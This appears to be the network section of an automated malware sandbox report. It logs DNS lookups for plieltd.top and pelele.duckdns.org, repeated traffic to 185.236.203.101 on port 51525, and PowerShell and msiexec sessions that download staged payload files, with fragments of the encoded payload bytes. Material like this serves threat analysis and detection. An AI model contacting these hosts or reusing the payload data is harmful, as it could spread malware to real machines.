                                                                                                                                              Oct 21, 2024 08:35:03.610109091 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610121965 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610137939 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610162973 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610172987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610181093 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610189915 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610207081 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610332966 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610383987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610394001 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610402107 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610419989 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.610428095 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612046003 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612091064 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612101078 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612118006 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612128019 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612183094 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612191916 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612200022 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:03.612215996 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.316589117 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.321500063 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.678992033 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.733601093 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.734920979 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:04.738564014 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738574982 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738616943 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738626003 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738660097 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738668919 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738719940 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738729954 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738769054 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.738780022 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743446112 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743458033 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743468046 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743520975 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743530989 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743539095 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743556976 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743566036 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743607044 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743616104 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743633032 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743659973 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:04.743669987 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.465642929 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.470498085 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.782790899 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.830874920 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.877307892 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.882142067 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882225990 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882236004 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882282019 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882289886 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882298946 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882307053 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882369995 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882409096 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882417917 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882426023 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882433891 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882448912 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.882457018 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.887475967 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:05.892323971 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892333984 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892349958 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892358065 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892375946 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892388105 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892393112 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892512083 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892541885 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:05.892550945 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.579862118 CEST4974151525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.584750891 CEST5152549741185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.895575047 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.960113049 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.962191105 CEST4974251525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:35:06.965020895 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965162992 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965173960 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965192080 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965200901 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965248108 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965257883 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965269089 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965280056 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965296984 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965306044 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965313911 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965421915 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.965431929 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.967102051 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.967111111 CEST5152549742185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:35:06.969820976 CEST5152549742185.236.203.101192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 21, 2024 08:34:01.051676989 CEST | 192.168.2.4 | 1.1.1.1 | 0x26fd | Standard query (0) | plieltd.top | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:41.966664076 CEST | 192.168.2.4 | 1.1.1.1 | 0x19ec | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:42.956191063 CEST | 192.168.2.4 | 1.1.1.1 | 0x19ec | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:43.988320112 CEST | 192.168.2.4 | 1.1.1.1 | 0x19ec | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:46.990537882 CEST | 192.168.2.4 | 1.1.1.1 | 0xea6 | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:48.016974926 CEST | 192.168.2.4 | 1.1.1.1 | 0xea6 | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:50.105990887 CEST | 192.168.2.4 | 1.1.1.1 | 0x847f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:51.096694946 CEST | 192.168.2.4 | 1.1.1.1 | 0x847f | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 21, 2024 08:34:01.459981918 CEST | 1.1.1.1 | 192.168.2.4 | 0x26fd | No error (0) | plieltd.top |  | 172.67.155.139 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:01.459981918 CEST | 1.1.1.1 | 192.168.2.4 | 0x26fd | No error (0) | plieltd.top |  | 104.21.56.189 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:45.977020025 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ec | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:45.977036953 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ec | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:45.977046013 CEST | 1.1.1.1 | 192.168.2.4 | 0x19ec | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:48.122287035 CEST | 1.1.1.1 | 192.168.2.4 | 0xea6 | No error (0) | pelele.duckdns.org |  | 185.236.203.101 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:48.124614000 CEST | 1.1.1.1 | 192.168.2.4 | 0xea6 | No error (0) | pelele.duckdns.org |  | 185.236.203.101 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:51.138307095 CEST | 1.1.1.1 | 192.168.2.4 | 0x847f | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 08:34:51.138350964 CEST | 1.1.1.1 | 192.168.2.4 | 0x847f | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• plieltd.top
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | 7104 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 08:34:51.145139933 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 21, 2024 08:34:51.998903990 CEST | 1164 | IN | HTTP/1.1 200 OK
date: Mon, 21 Oct 2024 06:34:51 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.155.139 | 443 | 6852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-21 06:34:02 UTC | 172 | OUT | GET /Underbyggelse.aaf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: plieltd.top
Connection: Keep-Alive
2024-10-21 06:34:02 UTC | 910 | IN | HTTP/1.1 200 OK
Date: Mon, 21 Oct 2024 06:34:02 GMT
Content-Length: 436336
Connection: close
Last-Modified: Sat, 19 Oct 2024 21:23:50 GMT
ETag: "6a870-624db09261e12"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2wN5a7b5Lspvp81IqV5zZL80OfRXRclrT96YjCAP5x%2BESDoV54nrX0V1BAoMwFcdMBs4B8xXhKSb3R0vuxT8S6U%2FYaUVNSPFpPkEcQRTnRD6oQPkg15z9kzWkXFWw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8d5f3833aea3485c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=786&delivery_rate=2271372&cwnd=246&unsent_bytes=0&cid=58df174075638f1c&ts=513&x=0"
                                                                                                                                              Data Ascii: F7ip6x+7jfB0T4pVnHw0yZz1sQEk0qT8UPDBSi4JnPZeq3jYhEWn2ZbvBbASvGEc+yBidgmqDbarSGLEQIMnPI0QQVzyLPV5d1LVdwP67QlQKJVZ4/ucw49rc4rETZ3s5ALEov5FhTyv6nf1ZPNWFDCo9iUH978r9ANHFVIcWVGc9QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 41 31 66 57 34 68 67 71 6a 41 46 42 30 4e 65 50 49 5a 45 78 46 4b 30 38 71 62 33 41 79 5a 66 57 2f 47 39 64 46 74 31 44 56 76 35 30 48 5a 7a 36 61 4e 45 6f 79 33 59 65 76 53 6e 7a 4b 51 2f 78 55 49 6a 73 39 74 67 59 55 36 2b 79 67 5a 54 68 43 6d 43 30 6c 39 6b 41 79 34 74 39 71 50 4e 59 67 2f 36 7a 47 73 4c 55 49 47 48 47 38 6e 4e 66 30 76 69 70 7a 4f 30 62 67 73 72 35 61 52 49 6e 41 4a 43 4f 62 51 72 7a 4a 6c 63 6b 30 64 4e 32 57 32 71 4e 45 38 41 4a 63 71 64 33 62 68 30 51 4c 5a 49 68 39 44 51 64 64 6a 50 72 39 6c 38 6f 4e 76 75 33 49 44 63 65 59 55 6c 73 52 4f 56 49 36 46 33 2b 63 74 59 6c 72 35 6b 6f 38 56 30 68 58 58 6c 69 79 51 72 55 42 62 78 2f 45 33 66 30 66 62 37 6f 55 6e 57 48 66 47 56 42 6d 6b 43 70 39 43 6f 30 53 30 73 30 47 35 39 4b 6e 32 52
                                                                                                                                              Data Ascii: A1fW4hgqjAFB0NePIZExFK08qb3AyZfW/G9dFt1DVv50HZz6aNEoy3YevSnzKQ/xUIjs9tgYU6+ygZThCmC0l9kAy4t9qPNYg/6zGsLUIGHG8nNf0vipzO0bgsr5aRInAJCObQrzJlck0dN2W2qNE8AJcqd3bh0QLZIh9DQddjPr9l8oNvu3IDceYUlsROVI6F3+ctYlr5ko8V0hXXliyQrUBbx/E3f0fb7oUnWHfGVBmkCp9Co0S0s0G59Kn2R
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 78 4f 55 36 4a 30 63 36 56 66 44 33 76 51 64 67 68 77 72 4a 53 6b 4c 64 68 39 39 4b 44 4d 2b 6e 42 70 4a 70 76 6b 4b 42 75 78 4b 36 78 7a 37 74 36 4a 67 63 56 78 59 77 74 51 67 56 70 37 63 4d 66 70 31 5a 68 54 72 41 79 66 4a 62 61 68 63 73 67 75 72 50 52 30 49 51 70 39 4f 65 4a 6f 30 67 47 50 4e 35 31 6a 2f 2f 65 56 58 41 36 30 73 4b 79 6e 30 6b 78 4a 78 39 46 46 6e 65 4b 31 68 61 4d 77 5a 62 69 49 4d 4c 56 61 4f 65 2f 42 4b 79 65 44 54 65 5a 58 6c 48 37 58 46 5a 41 4a 72 59 30 39 42 6c 6c 30 68 58 57 61 2b 6e 67 53 55 4f 68 58 6b 6c 7a 4e 65 7a 72 76 77 39 37 53 2b 71 6e 39 48 72 50 47 30 65 7a 6b 42 73 52 4d 4d 4c 76 58 34 34 39 56 34 2b 76 76 6b 49 6a 57 48 54 66 42 45 74 62 6e 4d 4b 50 4d 71 53 49 70 48 51 64 67 79 45 38 56 4d 4a 4d 43 5a 6f 32 76 7a
                                                                                                                                              Data Ascii: xOU6J0c6VfD3vQdghwrJSkLdh99KDM+nBpJpvkKBuxK6xz7t6JgcVxYwtQgVp7cMfp1ZhTrAyfJbahcsgurPR0IQp9OeJo0gGPN51j//eVXA60sKyn0kxJx9FFneK1haMwZbiIMLVaOe/BKyeDTeZXlH7XFZAJrY09Bll0hXWa+ngSUOhXklzNezrvw97S+qn9HrPG0ezkBsRMMLvX449V4+vvkIjWHTfBEtbnMKPMqSIpHQdgyE8VMJMCZo2vz
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 69 33 35 31 57 77 6d 63 2f 77 7a 50 39 30 62 74 4e 49 49 5a 2f 66 44 64 55 33 4b 6e 36 56 4e 36 79 56 74 34 42 32 30 73 77 75 33 71 48 6d 46 43 54 4d 6f 72 75 6e 50 57 67 43 5a 64 56 55 52 62 2b 68 7a 45 78 6a 78 2b 2f 72 4b 62 7a 6e 6d 39 52 45 43 68 72 4a 50 33 46 42 49 70 35 70 72 51 47 77 54 43 6a 34 6c 44 7a 4f 31 44 73 42 4f 79 65 33 71 57 4e 79 45 70 75 4f 4e 41 35 2b 53 62 4c 47 35 70 70 69 6e 6d 44 65 34 79 77 34 39 6f 4a 38 62 4e 52 6e 4b 49 4f 4e 6c 38 4a 6c 39 42 72 79 43 50 2b 42 58 52 47 55 62 58 38 41 4e 42 72 45 4e 6f 76 6c 48 52 65 30 69 62 57 74 39 69 54 32 6b 2f 2b 6f 46 34 39 45 77 41 44 53 76 52 43 50 31 75 6c 45 4a 56 7a 6a 52 37 5a 65 79 74 57 71 6c 6c 78 2f 66 47 78 30 6c 6a 4e 34 65 6c 65 64 66 46 51 71 57 66 4d 67 44 44 59 34 61
                                                                                                                                              Data Ascii: i351Wwmc/wzP90btNIIZ/fDdU3Kn6VN6yVt4B20swu3qHmFCTMorunPWgCZdVURb+hzExjx+/rKbznm9REChrJP3FBIp5prQGwTCj4lDzO1DsBOye3qWNyEpuONA5+SbLG5ppinmDe4yw49oJ8bNRnKIONl8Jl9BryCP+BXRGUbX8ANBrENovlHRe0ibWt9iT2k/+oF49EwADSvRCP1ulEJVzjR7ZeytWqllx/fGx0ljN4eledfFQqWfMgDDY4a
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 52 35 55 36 76 38 36 46 71 34 4c 2b 30 6b 48 2f 68 79 59 62 57 61 6f 46 68 4c 74 34 39 35 61 49 6d 38 65 54 4e 49 6a 45 48 52 6f 2f 6d 50 55 34 6c 6c 74 77 6a 56 4f 63 39 61 4c 65 6f 36 49 77 2f 4b 44 33 73 56 45 5a 56 71 4e 49 48 55 43 4e 55 35 7a 31 52 33 69 37 70 62 35 51 67 4e 47 78 51 68 34 64 65 72 38 79 2b 44 5a 31 4c 7a 56 49 2f 32 55 6d 56 49 34 65 6e 6a 2b 6c 32 4f 4a 4f 47 70 6e 6d 55 74 55 33 51 4a 79 6b 6a 77 72 30 45 48 50 74 53 41 31 61 2f 6d 42 55 43 7a 66 31 30 42 6e 4a 73 31 47 63 66 66 79 6c 44 61 4d 50 33 41 54 54 54 64 42 71 64 4a 32 78 34 33 52 33 41 41 68 61 74 39 42 71 71 50 67 6e 46 71 51 74 32 48 33 38 67 4d 7a 36 63 47 41 74 6d 69 66 50 7a 72 62 39 6f 71 69 6b 39 50 44 56 58 4b 79 4e 44 63 4b 36 54 74 79 67 39 37 46 52 36 54 62
                                                                                                                                              Data Ascii: R5U6v86Fq4L+0kH/hyYbWaoFhLt495aIm8eTNIjEHRo/mPU4lltwjVOc9aLeo6Iw/KD3sVEZVqNIHUCNU5z1R3i7pb5QgNGxQh4der8y+DZ1LzVI/2UmVI4enj+l2OJOGpnmUtU3QJykjwr0EHPtSA1a/mBUCzf10BnJs1GcffylDaMP3ATTTdBqdJ2x43R3AAhat9BqqPgnFqQt2H38gMz6cGAtmifPzrb9oqik9PDVXKyNDcK6Ttyg97FR6Tb
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 70 51 6c 45 4a 46 33 65 5a 41 2f 76 50 49 4f 5a
                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApQlEJF3eZA/vPIOZ
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 66 70 77 5a 70 6b 35 67 30 35 6d 56 52 58 66 59 4c 54 50 62 33 49 6d 76 4b 75 53 73 31 48 67 35 4f 4e 2b 58 78 71 56 62 59 53 43 75 4e 76 31 33 65 71 7a 54 70 59 38 35 44 39 67 69 34 70 5a 41 68 4e 71 36 71 47 7a 47 73 4c 70 41 48 75 4f 51 34 33 36 7a 6b 64 77 5a 58 50 54 45 47 44 6e 55 6f 4f 4c 54 69 31 31 61 78 62 78 56 59 34 4a 65 68 2f 4d 47 57 34 6d 41 44 36 33 48 53 31 64 51 4b 70 43 37 52 6a 51 50 46 51 6e 50 58 69 36 68 55 33 33 2b 34 64 42 73 59 64 68 64 41 77 75 75 70 62 78 38 73 56 35 68 49 39 59 39 72 4c 64 35 4b 75 66 62 54 76 69 4a 4e 45 55 58 64 35 5a 73 30 62 65 42 51 6a 42 56 36 6e 4f 6b 61 69 33 58 2b 6a 74 38 76 72 72 78 30 55 39 76 64 37 76 78 4c 6e 42 43 6e 47 61 73 41 49 70 65 35 2b 54 4a 33 33 6c 55 43 41 48 63 77 4e 6d 50 58 68 36
                                                                                                                                              Data Ascii: fpwZpk5g05mVRXfYLTPb3ImvKuSs1Hg5ON+XxqVbYSCuNv13eqzTpY85D9gi4pZAhNq6qGzGsLpAHuOQ436zkdwZXPTEGDnUoOLTi11axbxVY4Jeh/MGW4mAD63HS1dQKpC7RjQPFQnPXi6hU33+4dBsYdhdAwuupbx8sV5hI9Y9rLd5KufbTviJNEUXd5Zs0beBQjBV6nOkai3X+jt8vrrx0U9vd7vxLnBCnGasAIpe5+TJ33lUCAHcwNmPXh6
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 30 6e 76 4a 59 30 4c 44 52 2b 35 49 41 44 37 35 51 61 6e 69 78 65 52 71 53 2f 66 44 4b 62 49 71 63 48 63 47 56 45 41 64 71 65 67 49 6e 65 4c 37 69 54 6e 52 43 65 57 56 67 2b 64 42 76 78 34 7a 75 69 6e 52 61 4e 6b 68 74 50 64 69 6e 38 41 6f 32 6d 67 7a 71 53 4e 37 41 4f 36 45 4b 47 74 5a 62 6c 48 76 46 6c 44 6a 2b 54 2b 58 47 53 57 76 52 31 4f 77 56 43 73 35 50 73 73 43 33 66 54 43 54 78 5a 2f 37 62 42 30 33 32 6c 6b 57 7a 7a 68 72 6f 79 71 32 66 46 73 70 61 65 6e 4c 72 7a 42 56 75 43 71 77 48 54 4b 6a 44 38 71 62 50 6f 33 51 61 76 7a 50 65 52 74 30 52 31 53 72 78 33 6e 51 63 71 61 49 6a 70 46 30 58 7a 35 64 42 4e 54 59 6d 73 58 46 7a 71 43 70 56 57 7a 4e 71 66 6a 2b 6a 54 4a 78 38 35 66 78 79 62 4f 51 63 35 4f 4c 61 61 74 4f 4a 4c 69 64 39 4a 65 37 73 37
                                                                                                                                              Data Ascii: 0nvJY0LDR+5IAD75QanixeRqS/fDKbIqcHcGVEAdqegIneL7iTnRCeWVg+dBvx4zuinRaNkhtPdin8Ao2mgzqSN7AO6EKGtZblHvFlDj+T+XGSWvR1OwVCs5PssC3fTCTxZ/7bB032lkWzzhroyq2fFspaenLrzBVuCqwHTKjD8qbPo3QavzPeRt0R1Srx3nQcqaIjpF0Xz5dBNTYmsXFzqCpVWzNqfj+jTJx85fxybOQc5OLaatOJLid9Je7s7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.155.139 | 443 | 7104 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 06:34:38 UTC | 175 | OUT | GET /FevmSBTRsrPt160.bin HTTP/1.1
